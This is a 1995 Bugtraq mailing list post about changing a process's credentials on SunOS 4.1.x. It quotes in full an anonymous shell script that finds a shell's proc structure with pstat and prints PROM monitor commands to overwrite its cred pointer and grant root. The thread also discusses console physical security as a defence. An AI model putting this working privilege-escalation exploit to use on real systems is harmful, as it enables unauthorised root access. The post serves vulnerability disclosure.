Bugtraq mailing list archives

Re: Pointer to a process's credential structure?

From: fritchie () FreeNet MSP MN US (Scott Fritchie)
Date: Fri, 14 Apr 1995 13:47:26 -0500

On Fri, 14 Apr 1995 09:17:25 +0800, patrick () oes amdahl com (Patrick Horgan) said:

Browsing through some archived "bugtraq" messages I discovered a
really nifty way to change the effective and real userid of any
process running under SunOS 4.1.x (well, at least 4.1.2 and 4.1.3x).
That particular hole is demonstrably exploitable under Solaris 2.3
(and I assume Solaris 2.4), except for one little problem....


ph> I'd have to think...we used to be able to do this via the prom
ph> debugger.

I'll attach the message I found browsing spy.org's Web server at the
end of this one.  It will probably be a good memory refresher.  :-)

ph> We wouldn't have to know any address ahead of time, but
ph> could walk the kernels tables in the debugger from the prom
ph> prompt.

I'd thought of that, too.  More work, though -- SunOS 4's "pstat" is
so kind to give almost the exact address needed.

ph> I'd hope everyone knows
ph> that physical security is important, and that if you don't have it
ph> your in deep doo-doo.

You've got a point there.  At St. Olaf, we've got our machines
"protected" by the root password if you attempt to boot into
single-user mode (and haven't really cared all that much if someone
went to the trouble of bringing their own Sun-style-bootable drive),
but finding out about the monitor attack was a cool (in a twisted
sense) discovery.  "eeprom security-mode=command (?)", here we come.

-Scott
---
Scott E. Lystig Fritchie, UNIX Systems Manager       Co-founder:
Academic Computing Center, St. Olaf College          Twin Cities Free-Net
1510 St. Olaf Ave., Northfield, MN  55057            Organizing Committee
fritchie () stolaf edu ... 507/646.3407                 (Minneapolis/St. Paul, MN)
"Activism is the killer app for the net." -- Steven Cherry <stc () panix com>

--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- snip ---

#!/bin/sh -

# From: an100188 () anon penet fi
# Subject: Breaking in from the monitor at the console
# Date: Fri, 27 May 1994 15:34:36 UTC
# To: bugtraq () crimelab com
#
# Breaking into a machine, typically a workstation, by using the monitor
# at the console to poke values into memory has always been possible.  I
# didn't realize how simple and unobtrusive it was before I saw this
# script.  This one is for Suns, but the principle applies to any
# machine with a console monitor.  On Sun4s there is some sort of
# "secure mode" that I presume lets you disable the monitor.  It is
# possible to change the L1-A sequence to another pair of keys, but if
# you own /dev/console you can change it back.  This obscurity may or
# may not be useful.
#
# This particular attack needs a way to run the script on the machine,
# typically in a shell.  I presume there are other spots where you could
# tickle a machine that don't even require that.  Physically secure
# consoles prevent this attack.
#
# Sigh.
#
# ----------------------------------------------------------------------------
#
# Subject: Re: Breaking in from the monitor at the console
# Date: Sat, 28 May 1994 10:15:52 UTC
# To: bugtraq () crimelab com
#
# Oops, someone pointed out that the script was deleted by the anonymous
# mail signature-remover.  Sorry about that.  Here's the script:
#
#
#
# Program: fc-4.1.3
# Author: Anonymous
# Usage: fc-4.1.3 PID
#       PID is the PID of the shell you wish to give root to.
#
# Description:
#       Tell people how to give themselves root (on SunOS 4.1.3 machines)
#

# Give the program a known path
PATH="/bin:/usr/etc:/usr/ucb"
export PATH

if [ $1x = x ]; then
cat - << EOF
Usage: $0 PID
        Where PID is the PID of the shell you want to give root to.

Note - for csh the PID is stored in \$\$.
EOF
        exit 1
fi

# This is the start of the proc structure for a given PID.
procp=`pstat -u $1 | grep procp | cut -f2`

# This is really the only important information here.
# This number is the offset of the pointer to the cred structure
# in the proc structure.
ucred="4c"

cat - << EOF
On the console press '<L1>a', you should see then see the following message:
        Type  'go' to resume
        ok

type the following at the 'ok' prompt:
        b 2 do 0 $procp $ucred + l@ i + w! 2 +loop
        go

Notes:
        * On some sun keyboards the '<L1>' key is labeled 'Stop'.
        * There is Emacs style line editing available at the 'ok' prompt.
EOF

exit 0

Current thread:

Pointer to a process's credential structure? Scott Lystig Fritchie (Apr 12)
- Re: Pointer to a process's credential structure? John F. Haugh II (Apr 16)
- Re: Pointer to a process's credential structure? John C. Orthoefer (Apr 16)
  - Re: Pointer to a process's credential structure? Scott Lystig Fritchie (Apr 17)
  - Welcome to bugtraq Majordomo () fc net (Apr 20)
- <Possible follow-ups>
- Re: Pointer to a process's credential structure? Patrick Horgan (Apr 13)
  - Re: Pointer to a process's credential structure? Scott Fritchie (Apr 14)
- Re: Pointer to a process's credential structure? Frank Byrum (Apr 14)